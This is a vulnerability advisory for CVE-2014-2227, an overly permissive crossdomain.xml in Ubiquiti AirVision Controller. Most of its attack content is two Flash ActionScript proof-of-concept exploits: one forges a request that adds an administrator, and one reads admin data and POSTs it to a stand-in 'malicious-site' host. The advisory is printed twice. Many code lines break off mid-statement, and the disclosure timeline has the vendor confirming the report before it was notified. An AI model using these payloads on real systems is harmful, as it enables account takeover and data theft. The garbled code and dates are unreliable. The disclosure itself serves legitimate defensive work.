-----------
Vendor:
-----------
Ubiquiti Networks (http://www.ubnt.com/)
------------------------------
Affected Products/Versions:
------------------------------
AirVision Controller v2.1.3
Note: Previous versions may be affected
-----------------
Description:
-----------------
Title: Overly Permissive default crossdomain.xml file
CVE: CVE-2014-2227
CWE: http://cwe.mitre.org/data/
Detailed writeup: http://sethsec.blogspot.com/
Researcher: Seth Art - @sethsec
------------------------------
POC #1: Using crossdomain.xml to execute CSRF and add an administrator:
------------------------------
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
(https://github.com/gursev/
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLRequestHeader;
public class XDomainXploit3 extends Sprite {
public function XDomainXploit3() {
// Target URL from where the data is to be retrieved
var readFrom:String = "https//victim:7443/api/2.0/
var header:URLRequestHeader = new URLRequestHeader("Content-
"text/plain; charset=UTF-8");
var readRequest:URLRequest = new URLRequest(readFrom);
readRequest.method = URLRequestMethod.POST
readRequest.data =
"{\"name\":\"csrf-cdp\",\"
readRequest.requestHeaders.
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(
try {
getLoader.load(readRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
private function eventHandler(event:Event):void {
// URL to which retrieved data is to be sent
var sendTo:String = "http://www.malicious-site.
var sendRequest:URLRequest = new URLRequest(sendTo);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try {
sendLoader.load(sendRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
}
}
------------------------------
POC #2: Using crossdomain.xml to exfiltrate log data:
------------------------------
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
(https://github.com/gursev/
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
public class XDomainXploit extends Sprite {
public function XDomainXploit() {
// Target URL from where the data is to be retrieved
var readFrom:String = "/victim:7443/api/2.0/admin";
var readRequest:URLRequest = new URLRequest(readFrom);
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(
try {
getLoader.load(readRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
private function eventHandler(event:Event):void {
// URL to which retrieved data is to be sent
var sendTo:String = "http://www.malicious-site.
var sendRequest:URLRequest = new URLRequest(sendTo);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try {
sendLoader.load(sendRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
}
}
-------------
Solution:
-------------
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
The application name changed from AirVision to UniFi Video)
-----------------------------
Disclosure Timeline:
-----------------------------
2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product
2014-02-19: Ubiquti confirms receipt of AirVision report and existence
of the vulnerability
2014-02-28: CVE-2014-2227 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-06-13: Set public disclosure date of 2014-07-24
2014-07-24: Public disclosure
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Vendor:
-----------
Ubiquiti Networks (http://www.ubnt.com/)
------------------------------
Affected Products/Versions:
------------------------------
AirVision Controller v2.1.3
Note: Previous versions may be affected
-----------------
Description:
-----------------
Title: Overly Permissive default crossdomain.xml file
CVE: CVE-2014-2227
CWE: http://cwe.mitre.org/data/
Detailed writeup: http://sethsec.blogspot.com/
Researcher: Seth Art - @sethsec
------------------------------
POC #1: Using crossdomain.xml to execute CSRF and add an administrator:
------------------------------
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
(https://github.com/gursev/
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLRequestHeader;
public class XDomainXploit3 extends Sprite {
public function XDomainXploit3() {
// Target URL from where the data is to be retrieved
var readFrom:String = "https//victim:7443/api/2.0/
var header:URLRequestHeader = new URLRequestHeader("Content-
"text/plain; charset=UTF-8");
var readRequest:URLRequest = new URLRequest(readFrom);
readRequest.method = URLRequestMethod.POST
readRequest.data =
"{\"name\":\"csrf-cdp\",\"
readRequest.requestHeaders.
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(
try {
getLoader.load(readRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
private function eventHandler(event:Event):void {
// URL to which retrieved data is to be sent
var sendTo:String = "http://www.malicious-site.
var sendRequest:URLRequest = new URLRequest(sendTo);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try {
sendLoader.load(sendRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
}
}
------------------------------
POC #2: Using crossdomain.xml to exfiltrate log data:
------------------------------
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
(https://github.com/gursev/
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
public class XDomainXploit extends Sprite {
public function XDomainXploit() {
// Target URL from where the data is to be retrieved
var readFrom:String = "/victim:7443/api/2.0/admin";
var readRequest:URLRequest = new URLRequest(readFrom);
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(
try {
getLoader.load(readRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
private function eventHandler(event:Event):void {
// URL to which retrieved data is to be sent
var sendTo:String = "http://www.malicious-site.
var sendRequest:URLRequest = new URLRequest(sendTo);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try {
sendLoader.load(sendRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
}
}
-------------
Solution:
-------------
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
The application name changed from AirVision to UniFi Video)
-----------------------------
Disclosure Timeline:
-----------------------------
2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product
2014-02-19: Ubiquti confirms receipt of AirVision report and existence
of the vulnerability
2014-02-28: CVE-2014-2227 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-06-13: Set public disclosure date of 2014-07-24
2014-07-24: Public disclosure
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information